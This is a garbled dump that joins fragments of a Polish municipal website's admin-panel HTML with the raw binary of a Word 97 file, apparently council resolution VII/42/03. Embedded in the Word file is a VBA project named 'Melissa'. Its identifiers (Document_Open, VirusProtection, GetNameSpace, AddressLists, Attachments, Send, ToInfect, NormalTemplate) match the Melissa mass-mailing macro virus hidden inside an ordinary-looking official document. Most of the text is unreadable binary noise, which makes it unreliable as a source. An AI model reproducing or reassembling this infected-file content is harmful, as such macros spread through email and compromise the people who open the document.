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="2" WIDTH="9" HEIGHT="9" ALIGN="ABSMIDDLE"&gt;&lt;/TD&gt;&lt;TD WIDTH="100%" CLASS="podswietl"&gt;&lt;SMALL&gt;&lt;A HREF="?akcja=popraw&amp;id=141&amp;zwin=1"&gt;Uchwa�y 2002-2003&lt;/A&gt;&lt;/SMALL&gt;&lt;/TD&gt;&lt;TD CLASS="podswietl"&gt;&lt;A HREF="?akcja=gora&amp;id=141"&gt;&lt;IMG SRC="../gfx/admin/up.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="przesu� &amp;quot;Uchwa�y 2002-2003&amp;quot; do g�ry" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=dol&amp;id=141"&gt;&lt;IMG SRC="../gfx/admin/dn.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="przesu� &amp;quot;Uchwa�y 2002-2003&amp;quot; w d�" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=kopiuj&amp;id=141"&gt;&lt;IMG SRC="../gfx/admin/copy.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="kopiuj &amp;quot;Uchwa�y 2002-2003&amp;quot;" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=dodaj&amp;id=141"&gt;&lt;IMG SRC="../gfx/admin/plus.gif" WIDTH="12" HEIGHT="14" BORDER="0" HSPACE="1" ALT="dodaj poddokument do &amp;quot;Uchwa�y 2002-2003&amp;quot;" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="javascript: if (confirm('Czy na pewno chcesz skasowa� wybrany element?')) window.location.href='?akcja=usun&amp;id=141';"&gt;&lt;IMG SRC="../gfx/admin/minus.gif" WIDTH="12" HEIGHT="14" BORDER="0" HSPACE="1" ALT="usu� &amp;quot;Uchwa�y 2002-2003&amp;quot;" ALIGN="ABSMIDDL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&lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN="2"&gt;&lt;TABLE WIDTH="100%" CELLPADDING="0" CELLSPACING="0" BORDER="0"&gt;&lt;TR&gt;&lt;TD&gt;&lt;IMG SRC="../gfx/wzorce/strzalka_6.jpg" BORDER="0" HSPACE="2" WIDTH="9" HEIGHT="9" ALIGN="ABSMIDDLE"&gt;&lt;/TD&gt;&lt;TD WIDTH="100%"&gt;&lt;SMALL&gt;&lt;A HREF="?akcja=popraw&amp;id=142"&gt;Podatki i op�aty lokalne&lt;/A&gt;&lt;/SMALL&gt;&lt;/TD&gt;&lt;TD&gt;&lt;A HREF="?akcja=gora&amp;id=142"&gt;&lt;IMG SRC="../gfx/admin/up.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="przesu� &amp;quot;Podatki i op�aty lokalne&amp;quot; do g�ry" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=dol&amp;id=142"&gt;&lt;IMG SRC="../gfx/admin/dn.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="przesu� &amp;quot;Podatki i op�aty lokalne&amp;quot; w d�" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=kopiuj&amp;id=142"&gt;&lt;IMG SRC="../gfx/admin/copy.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="kopiuj &amp;quot;Podatki i op�aty lokalne&amp;quot;" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=dodaj&amp;id=142"&gt;&lt;IMG SRC="../gfx/admin/plus.gif" WIDTH="12" HEIGHT="14" BORDER="0" HSPACE="1" ALT="dodaj poddokument do &amp;quot;Podatki i op�aty lokalne&amp;quot;" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="javascript: if (confirm('Czy na pewno chcesz skasowa� wybrany element?')) window.location.href='?akcja=usun&amp;id=142';"&gt;&lt;IMG SRC="../gfx/admin/minus.gif" WIDTH="12" HEIGHT="14" BORDER="0" HSPACE="1" ALT="usu� &amp;quot;Podatki i op�aty lokalne&amp;quot;" ALIGN="ABSMIDDL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&lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN="2"&gt;&lt;TABLE WIDTH="100%" CELLPADDING="0" CELLSPACING="0" BORDER="0"&gt;&lt;TR&gt;&lt;TD&gt;&lt;IMG SRC="../gfx/wzorce/strzalka_6.jpg" BORDER="0" HSPACE="2" WIDTH="9" HEIGHT="9" ALIGN="ABSMIDDLE"&gt;&lt;/TD&gt;&lt;TD WIDTH="100%"&gt;&lt;SMALL&gt;&lt;A HREF="?akcja=popraw&amp;id=143"&gt;Informacje Urz�du&lt;/A&gt;&lt;/SMALL&gt;&lt;/TD&gt;&lt;TD&gt;&lt;A HREF="?akcja=gora&amp;id=143"&gt;&lt;IMG SRC="../gfx/admin/up.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="przesu� &amp;quot;Informacje Urz�du&amp;quot; do g�ry" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=dol&amp;id=143"&gt;&lt;IMG SRC="../gfx/admin/dn.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="przesu� &amp;quot;Informacje Urz�du&amp;quot; w d�" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=kopiuj&amp;id=143"&gt;&lt;IMG SRC="../gfx/admin/copy.gif" WIDTH="13" HEIGHT="14" BORDER="0" HSPACE="1" ALT="kopiuj &amp;quot;Informacje Urz�du&amp;quot;" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="?akcja=dodaj&amp;id=143"&gt;&lt;IMG SRC="../gfx/admin/plus.gif" WIDTH="12" HEIGHT="14" BORDER="0" HSPACE="1" ALT="dodaj poddokument do &amp;quot;Informacje Urz�du&amp;quot;" ALIGN="ABSMIDDLE"&gt;&lt;/A&gt;&lt;A HREF="javascript: if (confirm('Czy na pewno chcesz skasowa� wybrany element?')) window.location.href='?akcja=usun&amp;id=143';"&gt;&lt;IMG SRC="../gfx/admin/minus.gif" WIDTH="12" HEIGHT="14" BORDER="0" HSPACE="1" ALT="usu� &amp;quot;Informacje Urz�du&amp;quot;" ALIGN="ABSMIDDL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&lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN="2"&gt;&lt;TABLE WIDTH="100%" CELLPADDING="0" CELLSPACING="0" BORDER="0"&gt;&lt;TR&gt;&lt;TD&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;IMG SRC="../gfx/wzorce/strzalka_6.jpg" BORDER="0" HSPACE="2" WIDTH="9" HEIGHT="9" ALIGN="ABSMIDDLE"&gt;&lt;/TD&gt;&lt;TD WIDTH="100%"&gt;&lt;SMALL&gt;&lt;A  #j#e#d#n#o#c#z#e#[#n#i#e# #S#t#a#t#u#t# #S#t#o#w#a#r#z#y#s#z#e#n#i#a#.#</w:t>
        <w:t>#</w:t>
        <w:t>#P#a#r#a#g#r#a#f# #1#3# #p#k#t# #1# #S#t#a#t#u#t#u# #S#t#o#w#a#r#z#y#s#z#e#n#i#a# #w#s#k#a#z#u#j#e# #s#i###,# #|#e# #W#B#a#d#z#a#m#i# #S#t#o#w#a#r#z#y#s#z#e#n#i#a# #s###:#</w:t>
        <w:t>## W#a#l#n#e# #Z#e#b#r#a#n#i#e# #c#z#B#o#n#k#�#w# #w# #s#k#B#a#d#z#i#e# #p#o# #d#w#�#c#h# #p#r#z#e#d#s#t#a#w#i#c#i#e#l#i# #g#m#i#n## .# #</w:t>
        <w:t>#</w:t>
        <w:t>#W# #z#w#i###z#k#u# #z# #k#o#n#i#e#c#z#n#o#[#c#i### #z#w#o#B#a#n#i#a# #w# #n#a#j#b#l#i#|#s#z#y#m# #c#z#a#s#i#e# #W#a#l#n#e#g#o# #Z#e#b#r#a#n#i#a# #C#z#B#o#n#k#�#w# #S#t#o#w#a#r#z#y#s#z#e#n#i#a# #G#m#i#n# #Z#l###|#a#D#s#k#i#c#h#,# #w#n#o#s#z### #o# #w#y#r#a#|#e#n#i#e# #z#g#o#d#y# #n#a# #r#e#p#r#e#z#e#n#t#o#w#a#n#i#e# #G#m#i#n#y# #M#a#r#c#i#n#o#w#i#c#e# #w# #W#a#l#n#y#m# #Z#e#b#r#a#n#i#u# #C#z#B#o#n#k#�#w# #p#r#z#e#z# #j#e#j# #p#r#z#e#d#s#t#a#w#i#c#i#e#l#i#.#</w:t>
        <w:t>#</w:t>
        <w:t>#</w:t>
        <w:t>#</w:t>
        <w:t>#</w:t>
        <w:t>###########################################################################################################################################################################�###�###�###�###�###�###�###�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>#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  <w:t>##R###T###Z###��#�#����������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�B*###B*##CJ####5#�CJ########.###`###�###�###�###�###�###�###�###�###�###�###�###�###�###(</w:t>
        <w:tab/>
        <w:t>##*</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab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&amp;##F##############$#####$#######.###`###�###�###�###�###�###�###�###�###�###�###�###�###�###(</w:t>
        <w:tab/>
        <w:t>##*</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab/>
        <w:t>##�</w:t>
        <w:tab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Z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L###�###�###�###R###T###V###X###Z########�##�#####��#################����������#�������#�###################################################################################################################################################################################################################################</w:t>
        <w:tab/>
        <w:t>##########6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Z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L###�###�###�###R###T###V###X###Z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#######$#########$####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[###########.##@�##.#####S#t#a#n#d#a#r#d#o#w#y#########mH####################B#A@��#B#####D#o#m#y#[#l#n#a# #c#z#c#i#o#n#k#a# #a#k#a#p#i#t#u#############&lt;#B`##�#&lt;#####T#e#k#s#t# #p#o#d#s#t#a#w#o#w#y########$####CJ##D#P`####D#####T#e#k#s#t# #p#o#d#s#t#a#w#o#w#y# #2########$####5#�CJ###&lt;#Q`####&lt;#####T#e#k#s#t# #p#o#d#s#t#a#w#o#w#y# #3#########CJ######�###########����##### ��####### ��##########q###�#####</w:t>
        <w:t>#####################################################################Z###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Z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########{###�###�###�###�###�###</w:t>
        <w:t>#######H###K###M###Q###�###�###�###�###########,###7###m###y###�###�###�###�###�###�###)###4###�###�###�###########.###^###i###w###�###�###�###2###5###(###3###g###r###�###�#######################################################################################################��######S#e#k#r#e#t#a#r#i#a#t###A#:#\#D#o#k#u#m#e#n#t#3#.#d#o#c###�#3#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ڢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Թ�################################################�h##���#�###h##o(###-#####�#3#############������######�@#�##�###�#####3#####�#######�####################�###@#######@###########G#�#############�###############�#######T#i#m#e#s# #N#e#w# #R#o#m#a#n###5#�################################�####S#y#m#b#o#l###3&amp;�#############�###############�#######A#r#i#a#l###"###q#�###�###�#####kC��lC��##########�###################################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######################################################################��##########U#C#H#W#A#A#A# # #N#R# # #V#I#I#/#4#2#/#0#3#########S#e#k#r#e#t#a#r#i#a#t###S#e#k#r#e#t#a#r#i#a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  <w:t>###@#######L#######T#######\#######d#######�###########UCHWA�A  NR  VII/42/03###########CH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kretariat##########ekr########Normal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ekretariat#########1#kr########Microsoft Word 8.0#/@####F�#####@####������#@####(�#���#############�####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G######################�#######�###############################################UCHWA�A  NR  VII/42/0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6#######&gt;###########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###_PID_GUID#####�###A###N###{#A#8#8#4#8#8#4#D#-#4#1#D#F#-#1#1#D#8#-#9#7#E#6#-#0#0#6#0#0#8#4#5#1#E#C#F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����############################����############################����#### ###!###"#######$###%###�������(###7###��������������������/###0###1###2###3###4###5###6###����B###9###:###;###&lt;###=###&gt;###?###@###A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#V/���#8###@#######1#T#a#b#l#e#########################################################������������##########################################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##################################################################������������####################@N�,���#��.���#############V#B#A###############################################################��������########################@N�,���#��l.���#############M#e#l#i#s#s#a#######################################################</w:t>
        <w:tab/>
        <w:t>#######����####################################.###�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����?###@###A###B###C###D###E###F###G###��������J###K###L###M###N###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�######����####������####################################################################��������######����x###�#######�###����########K|I|##���###�####################################��######�###�###�#####����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##1#N#o#r#m#a#l#.#M#e#l#i#s#s#a#######�####����##�####�����������(#####��########��������O#f#####$#######��������####��������####����####������������U#####�#####0# #@�2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x###@�4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####@�6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####����@#####��##########0###��������####����0###��������####����������������########��������####������������������������������ME##������####��####��##################################################################��##U#"�###########�###########�##b########�##,###x####�##`###�####�###########�##&amp;########�##D###8####�######�####�######�####�##$###�####�######�####�##`###�####�######@####�##"###X####�######�####�######�####�######�####�######�####�#####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8####�#</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###X####�#</w:t>
        <w:tab/>
        <w:t>.###h####�#</w:t>
        <w:tab/>
        <w:t>N###�####�#</w:t>
        <w:tab/>
        <w:t>####�####�#</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########�#</w:t>
        <w:tab/>
        <w:t>#########�##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########�##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###(####�######8####�##\###@####�######�####�######�####�######�####�######�####�######�####�###########�###########�##.###(####�##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###X####�######h####�######�####�######�####�######�####�##.###�####�##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###�####�######�####�###########�###########�###########�##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###0####�######@####�######`####�######x####�##0###�####�######�####�##(###�####�######�####�###########�###########�##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>########�######(####�######H####�######`####�##0###h####�######�####�##(###�####�######�####�######�####�######�####�###########�##:########�######H####�##"###`####�######�####�</w:t>
        <w:tab/>
        <w:t>#&amp;###�####�</w:t>
        <w:tab/>
        <w:t>#*###�####�</w:t>
        <w:tab/>
        <w:t>#D###�####�</w:t>
        <w:tab/>
        <w:t>#@###8</w:t>
        <w:tab/>
        <w:t>###�##�###x</w:t>
        <w:tab/>
        <w:t>###�#######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###�</w:t>
        <w:tab/>
        <w:t>#####��������##(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�#Attribut#e VB_Nam#e = "Mel�iss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as#x1Nor#mal.#�####################################################_#V#B#A#_#P#R#O#J#E#C#T#############################################������������########################################~#######d#i#r###############################################################������������####################################&gt;###w#######P#R#O#J#E#C#T#w#m###################################################������������####################################H###########P#R#O#J#E#C#T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I###B#######�a_####�####</w:t>
        <w:tab/>
        <w:t>###�###################*#\#G#{#0#0#0#2#0#4#E#F#-#0#0#0#0#-#0#0#0#0#-#C#0#0#0#-#0#0#0#0#0#0#0#0#0#0#4#6#}###3#.#0###9###C#:#\#P#R#O#G#R#A#M# #F#I#L#E#S#\#C#O#M#M#O#N# #F#I#L#E#S#\#M#I#C#R#O#S#O#F#T# #S#H#A#R#E#D#\#V#B#A#\#V#B#A#3#3#2#.#D#L#L###V#i#s#u#a#l# #B#a#s#i#c# #F#o#r# #A#p#p#l#i#c#a#t#i#o#n#s###############*#\#G#{#0#0#0#2#0#9#0#5#-#0#0#0#0#-#0#0#0#0#-#C#0#0#0#-#0#0#0#0#0#0#0#0#0#0#4#6#}###8#.#0###4#0#9###C#:#\#P#r#o#g#r#a#m# #F#i#l#e#s#\#M#i#c#r#o#s#o#f#t# #O#f#f#i#c#e#\#O#f#f#i#c#e#\#M#S#W#O#R#D#8#.#O#L#B###M#i#c#r#o#s#o#f#t# #W#o#r#d# #8#.#0# #O#b#j#e#c#t# #L#i#b#r#a#r#y#############�#*#\#G#{#0#0#0#2#0#4#3#0#-#0#0#0#0#-#0#0#0#0#-#C#0#0#0#-#0#0#0#0#0#0#0#0#0#0#4#6#}###2#.#0###0###C#:#\#W#I#N#D#O#W#S#\#S#Y#S#T#E#M#\#S#t#d#O#l#e#2#.#T#l#b###O#L#E# #A#u#t#o#m#a#t#i#o#n#############�#*#\#G#{#9#F#9#3#9#F#8#2#-#5#5#4#6#-#1#1#D#3#-#9#7#E#6#-#0#0#6#0#0#8#4#5#1#E#C#F#}###2#.#0###0###C#:#\#W#I#N#D#O#W#S#\#S#Y#S#T#E#M#\#M#S#F#o#r#m#s#.#T#W#D###M#i#c#r#o#s#o#f#t# #F#o#r#m#s# #2#.#0# #O#b#j#e#c#t# #L#i#b#r#a#r#y#############�#*#\#G#{#9#F#9#3#9#F#8#3#-#5#5#4#6#-#1#1#D#3#-#9#7#E#6#-#0#0#6#0#0#8#4#5#1#E#C#F#}###2#.#0###0###C#:#\#W#I#N#D#O#W#S#\#T#E#M#P#\#V#B#E#\#M#S#F#o#r#m#s#.#E#X#D###M#i#c#r#o#s#o#f#t# #F#o#r#m#s# #2#.#0# #O#b#j#e#c#t# #L#i#b#r#a#r#y###############�.E</w:t>
        <w:t>��##�.#`�M#�####*#\#C#N#o#r#m#a#l###*#\#C#N#o#r#m#a#l#�#B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\#G#{#2#D#F#8#D#0#4#C#-#5#B#F#A#-#1#0#1#B#-#B#D#E#5#-#0#0#A#A#0#0#4#4#D#E#5#2#}###2#.#0###0###C#:#\#P#R#O#G#R#A#M# #F#I#L#E#S#\#M#I#C#R#O#S#O#F#T# #O#F#F#I#C#E#\#O#F#F#I#C#E#\#M#S#O#9#7#.#D#L#L###M#i#c#r#o#s#o#f#t# #O#f#f#i#c#e# #8#.#0# #O#b#j#e#c#t# #L#i#b#r#a#r#y#################################������####��##�P�?##��������������##������������������������������������������������####################K|####M#e#l#i#s#s#a#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#83ffd50ae###*D###��I|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L����A�#��#`#E#����####����`###�#####M#N#�#�/####WordS1 ###VBA�� ###Win16�# ###Win32�# ###Mac�� ###Projekt1�A ###stdole�` ###MSForms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 #</w:t>
        <w:tab/>
        <w:t>�##�###_Evaluate#� ###Normal�� ##�##�###Office#u ###Project-� ###MelissaQ� ###Documentj� #</w:t>
        <w:t>�##�###Document_Open� ##�##�###System#� ##�##�###PrivateProfileString[# ##�##�###CommandBars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># ##�##�###Controls�K ##�##�###Enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۪ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>##�##�###Options�� ##�##�###ConfirmConversions#� ##�##�###VirusProtectionoD ##�##�###SaveNormalPromptʼ ##�##�###UngaDasOutlookH� ##�##�###DasMapiNameg� ##�##�###BreakUmOffASlice�k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reateObject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GetNameSpaceC� ##�##�###Logon�L ##�##�###yp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AddressLists#� ###Count0v ##�##�###AddyBook�@ ##�##�###xo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CreateItem�~ ##�##�###oo�^ ##�##�###AddressEntries�� ##�##�###Peeps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Recipients� ###Add�r ##�##�###SubjectRP ##�##�###Application�* ##�##�###UserName\� ##�##�###Bodyp� ##�##�###Attachments_� ##�##�###ActiveDocument�\ ##�##�###FullNameО ##�##�###Send�� ##�##�###LogoffQ8 ##�##�###ADI1�� #</w:t>
        <w:tab/>
        <w:t>�##�###VBProjectO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VBComponents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>' ###Item�z ##�##�###NTI1�W ##�##�###NormalTemplateq� ##�##�###NTCL�V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CodeModule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CountOfLines!\ ##�##�###ADCL�� ##�##�###BGN�x ##�##�###DeleteLin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##�###ToInfect�� ##�##�###DoAD(� ##�##�###DoNT#� ##�##�###CYA�� ##�##�###Lines�� #</w:t>
        <w:t>�##�###AddFromString�� ##�##�###InsertLines�� ##�##�###SaveAsf; ##�##�###FileNamej� ##�##�###Savedd� ###Day�� ###Now&amp;� ###Minuteam #</w:t>
        <w:tab/>
        <w:t>�##�###SelectionZ� ##�##�###TypeTextw� ##��##`#######��####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������������####��####��##����####</w:t>
        <w:t>#������������</w:t>
        <w:t>################################s��########0*##�</w:t>
        <w:tab/>
        <w:t>#p##H##�##d�#######Project#Q#(##@#####=�#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##l#####</w:t>
        <w:tab/>
        <w:t>##��P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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###rstd#ole&gt;##s#t##d#o#l#eP#</w:t>
        <w:t>#f#%\##*#\G{00020�430-####C#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#####0046}##2.0#0#C:#\WINDOWS#\SYSTEM\#StdOle2.#Tlb#OLE #Automati,on#^####mMS#Forms&gt;##A#</w:t>
        <w:tab/>
        <w:t>M#S#F#Er##m#s#/#z</w:t>
        <w:t>�</w:t>
        <w:tab/>
        <w:t>p�##F9F93#9F82-554#6-11D3-9#7E6#F6008�451ECF#F#3#.TWD#Mic�rosoft #=" #` Ob#� L�ibrary#9##�#P0#�##r�##P#3,P�JP\VBE#\�(EX�(�.E#</w:t>
        <w:t>��##�.#``�M#���CxN�@UalCxN�Ta�x�## �+</w:t>
        <w:tab/>
        <w:t>�,C#</w:t>
        <w:tab/>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#�#B?##�#�OfficD�O@�`f#i#cB��=�#�#G{2DF8D#04C-5BFA#-101B-BD�E5#fAA@�4�##2#fPROGRA#M FILES\#MICROSOF#T OFFICE#\�#MSO97.#DLLHk�# 8.�0�k#��###�##K|#×elis�sa#</w:t>
        <w:tab/>
        <w:t>#2#�e�C�i#�s#a##@3(##HB#1�Γ#X###B###,B#IT|"B#+B##B##########Melissa#M#e#l#i#s#s#a###########################################ID="{A884884E-41DF-11D8-97E6-006008451ECF}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Document=Melissa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CMG="A3A16BFAFAFEFAFEFAFEFAFE"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>DPB="3634FE6F02919492949294"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>GC="C9CB01920292026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Melissa=0, 0, 0, 0, C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kument Microsoft Word#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###MSWo##C#o#m#p#O#b#j#########################################################��������####################################O###j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